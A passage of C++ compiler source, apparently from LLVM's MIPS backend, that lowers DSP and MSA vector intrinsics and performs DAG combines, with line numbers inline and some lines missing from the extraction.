SDLoc(N), 931  Ty, Op1, Op2); 932  } else if ((Ty == MVT::v2i16) || (Ty == MVT::v4i8)) { 933  SDValue SetCC = N->getOperand(0); 934  935  if (SetCC.getOpcode() != MipsISD::SETCC_DSP) 936  return SDValue(); 937  938  return DAG.getNode(MipsISD::SELECT_CC_DSP, SDLoc(N), Ty, 939  SetCC.getOperand(0), SetCC.getOperand(1), 940  N->getOperand(1), N->getOperand(2), SetCC.getOperand(2)); 941  } 942  943  return SDValue(); 944 } 945  947  const MipsSubtarget &Subtarget) { 948  EVT Ty = N->getValueType(0); 949  950  if (Subtarget.hasMSA() && Ty.is128BitVector() && Ty.isInteger()) { 951  // Try the following combines: 952  // (xor (or $a, $b), (build_vector allones)) 953  // (xor (or $a, $b), (bitcast (build_vector allones))) 954  SDValue Op0 = N->getOperand(0); 955  SDValue Op1 = N->getOperand(1); 956  SDValue NotOp; 957  959  NotOp = Op1; 960  else if (ISD::isBuildVectorAllOnes(Op1.getNode())) 961  NotOp = Op0; 962  else 963  return SDValue(); 964  965  if (NotOp->getOpcode() == ISD::OR) 966  return DAG.getNode(MipsISD::VNOR, SDLoc(N), Ty, NotOp->getOperand(0), 967  NotOp->getOperand(1)); 968  } 969  970  return SDValue(); 971 } 972  973 SDValue 975  SelectionDAG &DAG = DCI.DAG; 976  SDValue Val; 977  978  switch (N->getOpcode()) { 979  case ISD::AND: 980  Val = performANDCombine(N, DAG, DCI, Subtarget); 981  break; 982  case ISD::OR: 983  Val = performORCombine(N, DAG, DCI, Subtarget); 984  break; 985  case ISD::MUL: 986  return performMULCombine(N, DAG, DCI, this); 987  case ISD::SHL: 988  Val = performSHLCombine(N, DAG, DCI, Subtarget); 989  break; 990  case ISD::SRA: 991  return performSRACombine(N, DAG, DCI, Subtarget); 992  case ISD::SRL: 993  return performSRLCombine(N, DAG, DCI, Subtarget); 994  case ISD::VSELECT: 995  return performVSELECTCombine(N, DAG); 996  case ISD::XOR: 997  Val = performXORCombine(N, DAG, Subtarget); 998  break; 999  case ISD::SETCC: 1000  Val = performSETCCCombine(N, DAG); 1001  break; 1002  } 1003  1004  if (Val.getNode()) { 1005  DEBUG(dbgs() << "\nMipsSE DAG Combine:\n"; 1006  N->printrWithDepth(dbgs(), &DAG); 1007  dbgs() << "\n=> \n"; 1008  Val.getNode()->printrWithDepth(dbgs(), &DAG); 1009  dbgs() << "\n"); 1010  return Val; 1011  } 1012  1014 } 1015  1018  MachineBasicBlock *BB) const { 1019  switch (MI.getOpcode()) { 1020  default: 1022  case Mips::BPOSGE32_PSEUDO: 1023  return emitBPOSGE32(MI, BB); 1024  case Mips::SNZ_B_PSEUDO: 1025  return emitMSACBranchPseudo(MI, BB, Mips::BNZ_B); 1026  case Mips::SNZ_H_PSEUDO: 1027  return emitMSACBranchPseudo(MI, BB, Mips::BNZ_H); 1028  case Mips::SNZ_W_PSEUDO: 1029  return emitMSACBranchPseudo(MI, BB, Mips::BNZ_W); 1030  case Mips::SNZ_D_PSEUDO: 1031  return emitMSACBranchPseudo(MI, BB, Mips::BNZ_D); 1032  case Mips::SNZ_V_PSEUDO: 1033  return emitMSACBranchPseudo(MI, BB, Mips::BNZ_V); 1034  case Mips::SZ_B_PSEUDO: 1035  return emitMSACBranchPseudo(MI, BB, Mips::BZ_B); 1036  case Mips::SZ_H_PSEUDO: 1037  return emitMSACBranchPseudo(MI, BB, Mips::BZ_H); 1038  case Mips::SZ_W_PSEUDO: 1039  return emitMSACBranchPseudo(MI, BB, Mips::BZ_W); 1040  case Mips::SZ_D_PSEUDO: 1041  return emitMSACBranchPseudo(MI, BB, Mips::BZ_D); 1042  case Mips::SZ_V_PSEUDO: 1043  return emitMSACBranchPseudo(MI, BB, Mips::BZ_V); 1044  case Mips::COPY_FW_PSEUDO: 1045  return emitCOPY_FW(MI, BB); 1046  case Mips::COPY_FD_PSEUDO: 1047  return emitCOPY_FD(MI, BB); 1048  case Mips::INSERT_FW_PSEUDO: 1049  return emitINSERT_FW(MI, BB); 1050  case Mips::INSERT_FD_PSEUDO: 1051  return emitINSERT_FD(MI, BB); 1052  case Mips::INSERT_B_VIDX_PSEUDO: 1053  case Mips::INSERT_B_VIDX64_PSEUDO: 1054  return emitINSERT_DF_VIDX(MI, BB, 1, false); 1055  case Mips::INSERT_H_VIDX_PSEUDO: 1056  case Mips::INSERT_H_VIDX64_PSEUDO: 1057  return emitINSERT_DF_VIDX(MI, BB, 2, false); 1058  case Mips::INSERT_W_VIDX_PSEUDO: 1059  case Mips::INSERT_W_VIDX64_PSEUDO: 1060  return emitINSERT_DF_VIDX(MI, BB, 4, false); 1061  case Mips::INSERT_D_VIDX_PSEUDO: 1062  case Mips::INSERT_D_VIDX64_PSEUDO: 1063  return emitINSERT_DF_VIDX(MI, BB, 8, false); 1064  case Mips::INSERT_FW_VIDX_PSEUDO: 1065  case Mips::INSERT_FW_VIDX64_PSEUDO: 1066  return emitINSERT_DF_VIDX(MI, BB, 4, true); 1067  case Mips::INSERT_FD_VIDX_PSEUDO: 1068  case Mips::INSERT_FD_VIDX64_PSEUDO: 1069  return emitINSERT_DF_VIDX(MI, BB, 8, true); 1070  case Mips::FILL_FW_PSEUDO: 1071  return emitFILL_FW(MI, BB); 1072  case Mips::FILL_FD_PSEUDO: 1073  return emitFILL_FD(MI, BB); 1074  case Mips::FEXP2_W_1_PSEUDO: 1075  return emitFEXP2_W_1(MI, BB); 1076  case Mips::FEXP2_D_1_PSEUDO: 1077  return emitFEXP2_D_1(MI, BB); 1078  case Mips::ST_F16: 1079  return emitST_F16_PSEUDO(MI, BB); 1080  case Mips::LD_F16: 1081  return emitLD_F16_PSEUDO(MI, BB); 1082  case Mips::MSA_FP_EXTEND_W_PSEUDO: 1083  return emitFPEXTEND_PSEUDO(MI, BB, false); 1084  case Mips::MSA_FP_ROUND_W_PSEUDO: 1085  return emitFPROUND_PSEUDO(MI, BB, false); 1086  case Mips::MSA_FP_EXTEND_D_PSEUDO: 1087  return emitFPEXTEND_PSEUDO(MI, BB, true); 1088  case Mips::MSA_FP_ROUND_D_PSEUDO: 1089  return emitFPROUND_PSEUDO(MI, BB, true); 1090  } 1091 } 1092  1093 bool MipsSETargetLowering::isEligibleForTailCallOptimization( 1094  const CCState &CCInfo, unsigned NextStackOffset, 1095  const MipsFunctionInfo &FI) const { 1096  if (!UseMipsTailCalls) 1097  return false; 1098  1099  // Exception has to be cleared with eret. 1100  if (FI.isISR()) 1101  return false; 1102  1103  // Return false if either the callee or caller has a byval argument. 1104  if (CCInfo.getInRegsParamsCount() > 0 || FI.hasByvalArg()) 1105  return false; 1106  1107  // Return true if the callee's argument area is no larger than the 1108  // caller's. 1109  return NextStackOffset <= FI.getIncomingArgSize(); 1110 } 1111  1112 void MipsSETargetLowering:: 1113 getOpndList(SmallVectorImpl<SDValue> &Ops, 1114  std::deque<std::pair<unsigned, SDValue>> &RegsToPass, 1115  bool IsPICCall, bool GlobalOrExternal, bool InternalLinkage, 1116  bool IsCallReloc, CallLoweringInfo &CLI, SDValue Callee, 1117  SDValue Chain) const { 1118  Ops.push_back(Callee); 1119  MipsTargetLowering::getOpndList(Ops, RegsToPass, IsPICCall, GlobalOrExternal, 1120  InternalLinkage, IsCallReloc, CLI, Callee, 1121  Chain); 1122 } 1123  1124 SDValue MipsSETargetLowering::lowerLOAD(SDValue Op, SelectionDAG &DAG) const { 1125  LoadSDNode &Nd = *cast<LoadSDNode>(Op); 1126  1127  if (Nd.getMemoryVT() != MVT::f64 || !NoDPLoadStore) 1128  return MipsTargetLowering::lowerLOAD(Op, DAG); 1129  1130  // Replace a double precision load with two i32 loads and a buildpair64. 1131  SDLoc DL(Op); 1132  SDValue Ptr = Nd.getBasePtr(), Chain = Nd.getChain(); 1133  EVT PtrVT = Ptr.getValueType(); 1134  1135  // i32 load from lower address. 1136  SDValue Lo = DAG.getLoad(MVT::i32, DL, Chain, Ptr, MachinePointerInfo(), 1137  Nd.getAlignment(), Nd.getMemOperand()->getFlags()); 1138  1139  // i32 load from higher address. 1140  Ptr = DAG.getNode(ISD::ADD, DL, PtrVT, Ptr, DAG.getConstant(4, DL, PtrVT)); 1141  SDValue Hi = DAG.getLoad( 1142  MVT::i32, DL, Lo.getValue(1), Ptr, MachinePointerInfo(), 1143  std::min(Nd.getAlignment(), 4U), Nd.getMemOperand()->getFlags()); 1144  1145  if (!Subtarget.isLittle()) 1146  std::swap(Lo, Hi); 1147  1148  SDValue BP = DAG.getNode(MipsISD::BuildPairF64, DL, MVT::f64, Lo, Hi); 1149  SDValue Ops[2] = {BP, Hi.getValue(1)}; 1150  return DAG.getMergeValues(Ops, DL); 1151 } 1152  1153 SDValue MipsSETargetLowering::lowerSTORE(SDValue Op, SelectionDAG &DAG) const { 1154  StoreSDNode &Nd = *cast<StoreSDNode>(Op); 1155  1156  if (Nd.getMemoryVT() != MVT::f64 || !NoDPLoadStore) 1157  return MipsTargetLowering::lowerSTORE(Op, DAG); 1158  1159  // Replace a double precision store with two extractelement64s and i32 stores. 1160  SDLoc DL(Op); 1161  SDValue Val = Nd.getValue(), Ptr = Nd.getBasePtr(), Chain = Nd.getChain(); 1162  EVT PtrVT = Ptr.getValueType(); 1164  Val, DAG.getConstant(0, DL, MVT::i32)); 1166  Val, DAG.getConstant(1, DL, MVT::i32)); 1167  1168  if (!Subtarget.isLittle()) 1169  std::swap(Lo, Hi); 1170  1171  // i32 store to lower address. 1172  Chain = 1173  DAG.getStore(Chain, DL, Lo, Ptr, MachinePointerInfo(), Nd.getAlignment(), 1174  Nd.getMemOperand()->getFlags(), Nd.getAAInfo()); 1175  1176  // i32 store to higher address. 1177  Ptr = DAG.getNode(ISD::ADD, DL, PtrVT, Ptr, DAG.getConstant(4, DL, PtrVT)); 1178  return DAG.getStore(Chain, DL, Hi, Ptr, MachinePointerInfo(), 1179  std::min(Nd.getAlignment(), 4U), 1180  Nd.getMemOperand()->getFlags(), Nd.getAAInfo()); 1181 } 1182  1183 SDValue MipsSETargetLowering::lowerMulDiv(SDValue Op, unsigned NewOpc, 1184  bool HasLo, bool HasHi, 1185  SelectionDAG &DAG) const { 1186  // MIPS32r6/MIPS64r6 removed accumulator based multiplies. 1188  1189  EVT Ty = Op.getOperand(0).getValueType(); 1190  SDLoc DL(Op); 1191  SDValue Mult = DAG.getNode(NewOpc, DL, MVT::Untyped, 1192  Op.getOperand(0), Op.getOperand(1)); 1193  SDValue Lo, Hi; 1194  1195  if (HasLo) 1196  Lo = DAG.getNode(MipsISD::MFLO, DL, Ty, Mult); 1197  if (HasHi) 1198  Hi = DAG.getNode(MipsISD::MFHI, DL, Ty, Mult); 1199  1200  if (!HasLo || !HasHi) 1201  return HasLo ? Lo : Hi; 1202  1203  SDValue Vals[] = { Lo, Hi }; 1204  return DAG.getMergeValues(Vals, DL); 1205 } 1206  1208  SDValue InLo = DAG.getNode(ISD::EXTRACT_ELEMENT, DL, MVT::i32, In, 1209  DAG.getConstant(0, DL, MVT::i32)); 1210  SDValue InHi = DAG.getNode(ISD::EXTRACT_ELEMENT, DL, MVT::i32, In, 1211  DAG.getConstant(1, DL, MVT::i32)); 1212  return DAG.getNode(MipsISD::MTLOHI, DL, MVT::Untyped, InLo, InHi); 1213 } 1214  1215 static SDValue extractLOHI(SDValue Op, const SDLoc &DL, SelectionDAG &DAG) { 1216  SDValue Lo = DAG.getNode(MipsISD::MFLO, DL, MVT::i32, Op); 1217  SDValue Hi = DAG.getNode(MipsISD::MFHI, DL, MVT::i32, Op); 1218  return DAG.getNode(ISD::BUILD_PAIR, DL, MVT::i64, Lo, Hi); 1219 } 1220  1221 // This function expands mips intrinsic nodes which have 64-bit input operands 1222 // or output values. 1223 // 1224 // out64 = intrinsic-node in64 1225 // => 1226 // lo = copy (extract-element (in64, 0)) 1227 // hi = copy (extract-element (in64, 1)) 1228 // mips-specific-node 1229 // v0 = copy lo 1230 // v1 = copy hi 1231 // out64 = merge-values (v0, v1) 1232 // 1233 static SDValue lowerDSPIntr(SDValue Op, SelectionDAG &DAG, unsigned Opc) { 1234  SDLoc DL(Op); 1235  bool HasChainIn = Op->getOperand(0).getValueType() == MVT::Other; 1237  unsigned OpNo = 0; 1238  1239  // See if Op has a chain input. 1240  if (HasChainIn) 1241  Ops.push_back(Op->getOperand(OpNo++)); 1242  1243  // The next operand is the intrinsic opcode. 1245  1246  // See if the next operand has type i64. 1247  SDValue Opnd = Op->getOperand(++OpNo), In64; 1248  1249  if (Opnd.getValueType() == MVT::i64) 1250  In64 = initAccumulator(Opnd, DL, DAG); 1251  else 1252  Ops.push_back(Opnd); 1253  1254  // Push the remaining operands. 1255  for (++OpNo ; OpNo < Op->getNumOperands(); ++OpNo) 1256  Ops.push_back(Op->getOperand(OpNo)); 1257  1258  // Add In64 to the end of the list. 1259  if (In64.getNode()) 1260  Ops.push_back(In64); 1261  1262  // Scan output. 1263  SmallVector<EVT, 2> ResTys; 1264  1265  for (SDNode::value_iterator I = Op->value_begin(), E = Op->value_end(); 1266  I != E; ++I) 1267  ResTys.push_back((*I == MVT::i64) ? MVT::Untyped : *I); 1268  1269  // Create node. 1270  SDValue Val = DAG.getNode(Opc, DL, ResTys, Ops); 1271  SDValue Out = (ResTys[0] == MVT::Untyped) ? extractLOHI(Val, DL, DAG) : Val; 1272  1273  if (!HasChainIn) 1274  return Out; 1275  1276  assert(Val->getValueType(1) == MVT::Other); 1277  SDValue Vals[] = { Out, SDValue(Val.getNode(), 1) }; 1278  return DAG.getMergeValues(Vals, DL); 1279 } 1280  1281 // Lower an MSA copy intrinsic into the specified SelectionDAG node 1282 static SDValue lowerMSACopyIntr(SDValue Op, SelectionDAG &DAG, unsigned Opc) { 1283  SDLoc DL(Op); 1284  SDValue Vec = Op->getOperand(1); 1285  SDValue Idx = Op->getOperand(2); 1286  EVT ResTy = Op->getValueType(0); 1287  EVT EltTy = Vec->getValueType(0).getVectorElementType(); 1288  1289  SDValue Result = DAG.getNode(Opc, DL, ResTy, Vec, Idx, 1290  DAG.getValueType(EltTy)); 1291  1292  return Result; 1293 } 1294  1295 static SDValue lowerMSASplatZExt(SDValue Op, unsigned OpNr, SelectionDAG &DAG) { 1296  EVT ResVecTy = Op->getValueType(0); 1297  EVT ViaVecTy = ResVecTy; 1298  bool BigEndian = !DAG.getSubtarget().getTargetTriple().isLittleEndian(); 1299  SDLoc DL(Op); 1300  1301  // When ResVecTy == MVT::v2i64, LaneA is the upper 32 bits of the lane and 1302  // LaneB is the lower 32-bits. Otherwise LaneA and LaneB are alternating 1303  // lanes. 1304  SDValue LaneA = Op->getOperand(OpNr); 1305  SDValue LaneB; 1306  1307  if (ResVecTy == MVT::v2i64) { 1308  LaneB = DAG.getConstant(0, DL, MVT::i32); 1309  ViaVecTy = MVT::v4i32; 1310  if(BigEndian) 1311  std::swap(LaneA, LaneB); 1312  } else 1313  LaneB = LaneA; 1314  1315  SDValue Ops[16] = { LaneA, LaneB, LaneA, LaneB, LaneA, LaneB, LaneA, LaneB, 1316  LaneA, LaneB, LaneA, LaneB, LaneA, LaneB, LaneA, LaneB }; 1317  1318  SDValue Result = DAG.getBuildVector( 1319  ViaVecTy, DL, makeArrayRef(Ops, ViaVecTy.getVectorNumElements())); 1320  1321  if (ViaVecTy != ResVecTy) { 1322  SDValue One = DAG.getConstant(1, DL, ViaVecTy); 1323  Result = DAG.getNode(ISD::BITCAST, DL, ResVecTy, 1324  DAG.getNode(ISD::AND, DL, ViaVecTy, Result, One)); 1325  } 1326  1327  return Result; 1328 } 1329  1330 static SDValue lowerMSASplatImm(SDValue Op, unsigned ImmOp, SelectionDAG &DAG, 1331  bool IsSigned = false) { 1332  return DAG.getConstant( 1334  Op->getConstantOperandVal(ImmOp), IsSigned), 1335  SDLoc(Op), Op->getValueType(0)); 1336 } 1337  1338 static SDValue getBuildVectorSplat(EVT VecTy, SDValue SplatValue, 1339  bool BigEndian, SelectionDAG &DAG) { 1340  EVT ViaVecTy = VecTy; 1341  SDValue SplatValueA = SplatValue; 1342  SDValue SplatValueB = SplatValue; 1343  SDLoc DL(SplatValue); 1344  1345  if (VecTy == MVT::v2i64) { 1346  // v2i64 BUILD_VECTOR must be performed via v4i32 so split into i32's. 1347  ViaVecTy = MVT::v4i32; 1348  1349  SplatValueA = DAG.getNode(ISD::TRUNCATE, DL, MVT::i32, SplatValue); 1350  SplatValueB = DAG.getNode(ISD::SRL, DL, MVT::i64, SplatValue, 1351  DAG.getConstant(32, DL, MVT::i32)); 1352  SplatValueB = DAG.getNode(ISD::TRUNCATE, DL, MVT::i32, SplatValueB); 1353  } 1354  1355  // We currently hold the parts in little endian order. Swap them if 1356  // necessary. 1357  if (BigEndian) 1358  std::swap(SplatValueA, SplatValueB); 1359  1360  SDValue Ops[16] = { SplatValueA, SplatValueB, SplatValueA, SplatValueB, 1361  SplatValueA, SplatValueB, SplatValueA, SplatValueB, 1362  SplatValueA, SplatValueB, SplatValueA, SplatValueB, 1363  SplatValueA, SplatValueB, SplatValueA, SplatValueB }; 1364  1365  SDValue Result = DAG.getBuildVector( 1366  ViaVecTy, DL, makeArrayRef(Ops, ViaVecTy.getVectorNumElements())); 1367  1368  if (VecTy != ViaVecTy) 1369  Result = DAG.getNode(ISD::BITCAST, DL, VecTy, Result); 1370  1371  return Result; 1372 } 1373  1375  unsigned Opc, SDValue Imm, 1376  bool BigEndian) { 1377  EVT VecTy = Op->getValueType(0); 1378  SDValue Exp2Imm; 1379  SDLoc DL(Op); 1380  1381  // The DAG Combiner can't constant fold bitcasted vectors yet so we must do it 1382  // here for now. 1383  if (VecTy == MVT::v2i64) { 1384  if (ConstantSDNode *CImm = dyn_cast<ConstantSDNode>(Imm)) { 1385  APInt BitImm = APInt(64, 1) << CImm->getAPIntValue(); 1386  1387  SDValue BitImmHiOp = DAG.getConstant(BitImm.lshr(32).trunc(32), DL, 1388  MVT::i32); 1389  SDValue BitImmLoOp = DAG.getConstant(BitImm.trunc(32), DL, MVT::i32); 1390  1391  if (BigEndian) 1392  std::swap(BitImmLoOp, BitImmHiOp); 1393  1394  Exp2Imm = DAG.getNode( 1395  ISD::BITCAST, DL, MVT::v2i64, 1396  DAG.getBuildVector(MVT::v4i32, DL, 1397  {BitImmLoOp, BitImmHiOp, BitImmLoOp, BitImmHiOp})); 1398  } 1399  } 1400  1401  if (!Exp2Imm.getNode()) { 1402  // We couldnt constant fold, do a vector shift instead 1403  1404  // Extend i32 to i64 if necessary. Sign or zero extend doesn't matter since 1405  // only values 0-63 are valid. 1406  if (VecTy == MVT::v2i64) 1407  Imm = DAG.getNode(ISD::ZERO_EXTEND, DL, MVT::i64, Imm); 1408  1409  Exp2Imm = getBuildVectorSplat(VecTy, Imm, BigEndian, DAG); 1410  1411  Exp2Imm = DAG.getNode(ISD::SHL, DL, VecTy, DAG.getConstant(1, DL, VecTy), 1412  Exp2Imm); 1413  } 1414  1415  return DAG.getNode(Opc, DL, VecTy, Op->getOperand(1), Exp2Imm); 1416 } 1417  1419  SDLoc DL(Op); 1420  EVT ResTy = Op->getValueType(0); 1421  SDValue Vec = Op->getOperand(2); 1422  bool BigEndian = !DAG.getSubtarget().getTargetTriple().isLittleEndian(); 1423  MVT ResEltTy = ResTy == MVT::v2i64 ? MVT::i64 : MVT::i32; 1424  SDValue ConstValue = DAG.getConstant(Vec.getScalarValueSizeInBits() - 1, 1425  DL, ResEltTy); 1426  SDValue SplatVec = getBuildVectorSplat(ResTy, ConstValue, BigEndian, DAG); 1427  1428  return DAG.getNode(ISD::AND, DL, ResTy, Vec, SplatVec); 1429 } 1430  1432  EVT ResTy = Op->getValueType(0); 1433  SDLoc DL(Op); 1434  SDValue One = DAG.getConstant(1, DL, ResTy); 1435  SDValue Bit = DAG.getNode(ISD::SHL, DL, ResTy, One, truncateVecElts(Op, DAG)); 1436  1437  return DAG.getNode(ISD::AND, DL, ResTy, Op->getOperand(1), 1438  DAG.getNOT(DL, Bit, ResTy)); 1439 } 1440  1442  SDLoc DL(Op); 1443  EVT ResTy = Op->getValueType(0); 1444  APInt BitImm = APInt(ResTy.getScalarSizeInBits(), 1) 1445  << cast<ConstantSDNode>(Op->getOperand(2))->getAPIntValue(); 1446  SDValue BitMask = DAG.getConstant(~BitImm, DL, ResTy); 1447  1448  return DAG.getNode(ISD::AND, DL, ResTy, Op->getOperand(1), BitMask); 1449 } 1450  1451 SDValue MipsSETargetLowering::lowerINTRINSIC_WO_CHAIN(SDValue Op, 1452  SelectionDAG &DAG) const { 1453  SDLoc DL(Op); 1454  unsigned Intrinsic = cast<ConstantSDNode>(Op->getOperand(0))->getZExtValue(); 1455  switch (Intrinsic) { 1456  default: 1457  return SDValue(); 1458  case Intrinsic::mips_shilo: 1459  return lowerDSPIntr(Op, DAG, MipsISD::SHILO); 1460  case Intrinsic::mips_dpau_h_qbl: 1461  return lowerDSPIntr(Op, DAG, MipsISD::DPAU_H_QBL); 1462  case Intrinsic::mips_dpau_h_qbr: 1463  return lowerDSPIntr(Op, DAG, MipsISD::DPAU_H_QBR); 1464  case Intrinsic::mips_dpsu_h_qbl: 1465  return lowerDSPIntr(Op, DAG, MipsISD::DPSU_H_QBL); 1466  case Intrinsic::mips_dpsu_h_qbr: 1467  return lowerDSPIntr(Op, DAG, MipsISD::DPSU_H_QBR); 1468  case Intrinsic::mips_dpa_w_ph: 1469  return lowerDSPIntr(Op, DAG, MipsISD::DPA_W_PH); 1470  case Intrinsic::mips_dps_w_ph: 1471  return lowerDSPIntr(Op, DAG, MipsISD::DPS_W_PH); 1472  case Intrinsic::mips_dpax_w_ph: 1473  return lowerDSPIntr(Op, DAG, MipsISD::DPAX_W_PH); 1474  case Intrinsic::mips_dpsx_w_ph: 1475  return lowerDSPIntr(Op, DAG, MipsISD::DPSX_W_PH); 1476  case Intrinsic::mips_mulsa_w_ph: 1477  return lowerDSPIntr(Op, DAG, MipsISD::MULSA_W_PH); 1478  case Intrinsic::mips_mult: 1479  return lowerDSPIntr(Op, DAG, MipsISD::Mult); 1480  case Intrinsic::mips_multu: 1481  return lowerDSPIntr(Op, DAG, MipsISD::Multu); 1482  case Intrinsic::mips_madd: 1483  return lowerDSPIntr(Op, DAG, MipsISD::MAdd); 1484  case Intrinsic::mips_maddu: 1485  return lowerDSPIntr(Op, DAG, MipsISD::MAddu); 1486  case Intrinsic::mips_msub: 1487  return lowerDSPIntr(Op, DAG, MipsISD::MSub); 1488  case Intrinsic::mips_msubu: 1489  return lowerDSPIntr(Op, DAG, MipsISD::MSubu); 1490  case Intrinsic::mips_addv_b: 1491  case Intrinsic::mips_addv_h: 1492  case Intrinsic::mips_addv_w: 1493  case Intrinsic::mips_addv_d: 1494  return DAG.getNode(ISD::ADD, DL, Op->getValueType(0), Op->getOperand(1), 1495  Op->getOperand(2)); 1496  case Intrinsic::mips_addvi_b: 1497  case Intrinsic::mips_addvi_h: 1498  case Intrinsic::mips_addvi_w: 1499  case Intrinsic::mips_addvi_d: 1500  return DAG.getNode(ISD::ADD, DL, Op->getValueType(0), Op->getOperand(1), 1501  lowerMSASplatImm(Op, 2, DAG)); 1502  case Intrinsic::mips_and_v: 1503  return DAG.getNode(ISD::AND, DL, Op->getValueType(0), Op->getOperand(1), 1504  Op->getOperand(2)); 1505  case Intrinsic::mips_andi_b: 1506  return DAG.getNode(ISD::AND, DL, Op->getValueType(0), Op->getOperand(1), 1507  lowerMSASplatImm(Op, 2, DAG)); 1508  case Intrinsic::mips_bclr_b: 1509  case Intrinsic::mips_bclr_h: 1510  case Intrinsic::mips_bclr_w: 1511  case Intrinsic::mips_bclr_d: 1512  return lowerMSABitClear(Op, DAG); 1513  case Intrinsic::mips_bclri_b: 1514  case Intrinsic::mips_bclri_h: 1515  case Intrinsic::mips_bclri_w: 1516  case Intrinsic::mips_bclri_d: 1517  return lowerMSABitClearImm(Op, DAG); 1518  case Intrinsic::mips_binsli_b: 1519  case Intrinsic::mips_binsli_h: 1520  case Intrinsic::mips_binsli_w: 1521  case Intrinsic::mips_binsli_d: { 1522  // binsli_x(IfClear, IfSet, nbits) -> (vselect LBitsMask, IfSet, IfClear) 1523  EVT VecTy = Op->getValueType(0); 1524  EVT EltTy = VecTy.getVectorElementType(); 1525  if (Op->getConstantOperandVal(3) >= EltTy.getSizeInBits()) 1526  report_fatal_error("Immediate out of range"); 1528  Op->getConstantOperandVal(3) + 1); 1529  return DAG.getNode(ISD::VSELECT, DL, VecTy, 1530  DAG.getConstant(Mask, DL, VecTy, true), 1531  Op->getOperand(2), Op->getOperand(1)); 1532  } 1533  case Intrinsic::mips_binsri_b: 1534  case Intrinsic::mips_binsri_h: 1535  case Intrinsic::mips_binsri_w: 1536  case Intrinsic::mips_binsri_d: { 1537  // binsri_x(IfClear, IfSet, nbits) -> (vselect RBitsMask, IfSet, IfClear) 1538  EVT VecTy = Op->getValueType(0); 1539  EVT EltTy = VecTy.getVectorElementType(); 1540  if (Op->getConstantOperandVal(3) >= EltTy.getSizeInBits()) 1541  report_fatal_error("Immediate out of range"); 1543  Op->getConstantOperandVal(3) + 1); 1544  return DAG.getNode(ISD::VSELECT, DL, VecTy, 1545  DAG.getConstant(Mask, DL, VecTy, true), 1546  Op->getOperand(2), Op->getOperand(1)); 1547  } 1548  case Intrinsic::mips_bmnz_v: 1549  return DAG.getNode(ISD::VSELECT, DL, Op->getValueType(0), Op->getOperand(3), 1550  Op->getOperand(2), Op->getOperand(1)); 1551  case Intrinsic::mips_bmnzi_b: 1552  return DAG.getNode(ISD::VSELECT, DL, Op->getValueType(0), 1553  lowerMSASplatImm(Op, 3, DAG), Op->getOperand(2), 1554  Op->getOperand(1)); 1555  case Intrinsic::mips_bmz_v: 1556  return DAG.getNode(ISD::VSELECT, DL, Op->getValueType(0), Op->getOperand(3), 1557  Op->getOperand(1), Op->getOperand(2)); 1558  case Intrinsic::mips_bmzi_b: 1559  return DAG.getNode(ISD::VSELECT, DL, Op->getValueType(0), 1560  lowerMSASplatImm(Op, 3, DAG), Op->getOperand(1), 1561  Op->getOperand(2)); 1562  case Intrinsic::mips_bneg_b: 1563  case Intrinsic::mips_bneg_h: 1564  case Intrinsic::mips_bneg_w: 1565  case Intrinsic::mips_bneg_d: { 1566  EVT VecTy = Op->getValueType(0); 1567  SDValue One = DAG.getConstant(1, DL, VecTy); 1568  1569  return DAG.getNode(ISD::XOR, DL, VecTy, Op->getOperand(1), 1570  DAG.getNode(ISD::SHL, DL, VecTy, One, 1571  truncateVecElts(Op, DAG))); 1572  } 1573  case Intrinsic::mips_bnegi_b: 1574  case Intrinsic::mips_bnegi_h: 1575  case Intrinsic::mips_bnegi_w: 1576  case Intrinsic::mips_bnegi_d: 1577  return lowerMSABinaryBitImmIntr(Op, DAG, ISD::XOR, Op->getOperand(2), 1578  !Subtarget.isLittle()); 1579  case Intrinsic::mips_bnz_b: 1580  case Intrinsic::mips_bnz_h: 1581  case Intrinsic::mips_bnz_w: 1582  case Intrinsic::mips_bnz_d: 1583  return DAG.getNode(MipsISD::VALL_NONZERO, DL, Op->getValueType(0), 1584  Op->getOperand(1)); 1585  case Intrinsic::mips_bnz_v: 1586  return DAG.getNode(MipsISD::VANY_NONZERO, DL, Op->getValueType(0), 1587  Op->getOperand(1)); 1588  case Intrinsic::mips_bsel_v: 1589  // bsel_v(Mask, IfClear, IfSet) -> (vselect Mask, IfSet, IfClear) 1590  return DAG.getNode(ISD::VSELECT, DL, Op->getValueType(0), 1591  Op->getOperand(1), Op->getOperand(3), 1592  Op->getOperand(2)); 1593  case Intrinsic::mips_bseli_b: 1594  // bseli_v(Mask, IfClear, IfSet) -> (vselect Mask, IfSet, IfClear) 1595  return DAG.getNode(ISD::VSELECT, DL, Op->getValueType(0), 1596  Op->getOperand(1), lowerMSASplatImm(Op, 3, DAG), 1597  Op->getOperand(2)); 1598  case Intrinsic::mips_bset_b: 1599  case Intrinsic::mips_bset_h: 1600  case Intrinsic::mips_bset_w: 1601  case Intrinsic::mips_bset_d: { 1602  EVT VecTy = Op->getValueType(0); 1603  SDValue One = DAG.getConstant(1, DL, VecTy); 1604  1605  return DAG.getNode(ISD::OR, DL, VecTy, Op->getOperand(1), 1606  DAG.getNode(ISD::SHL, DL, VecTy, One, 1607  truncateVecElts(Op, DAG))); 1608  } 1609  case Intrinsic::mips_bseti_b: 1610  case Intrinsic::mips_bseti_h: 1611  case Intrinsic::mips_bseti_w: 1612  case Intrinsic::mips_bseti_d: 1613  return lowerMSABinaryBitImmIntr(Op, DAG, ISD::OR, Op->getOperand(2), 1614  !Subtarget.isLittle()); 1615  case Intrinsic::mips_bz_b: 1616  case Intrinsic::mips_bz_h: 1617  case Intrinsic::mips_bz_w: 1618  case Intrinsic::mips_bz_d: 1619  return DAG.getNode(MipsISD::VALL_ZERO, DL, Op->getValueType(0), 1620  Op->getOperand(1)); 1621  case Intrinsic::mips_bz_v: 1622  return DAG.getNode(MipsISD::VANY_ZERO, DL, Op->getValueType(0), 1623  Op->getOperand(1)); 1624  case Intrinsic::mips_ceq_b: 1625  case Intrinsic::mips_ceq_h: 1626  case Intrinsic::mips_ceq_w: 1627  case Intrinsic::mips_ceq_d: 1628  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1629  Op->getOperand(2), ISD::SETEQ); 1630  case Intrinsic::mips_ceqi_b: 1631  case Intrinsic::mips_ceqi_h: 1632  case Intrinsic::mips_ceqi_w: 1633  case Intrinsic::mips_ceqi_d: 1634  return DAG.getSetCC(DL, Op->getValueType(0), Op->getOperand(1), 1635  lowerMSASplatImm(Op, 2, DAG, true), ISD::SETEQ); 1636  case Intrinsic::mips_cle_s_b: 1637  case Intrinsic::mips_cle_s_h: 1638  case Intrinsic::mips_cle_s_w: 1639  case 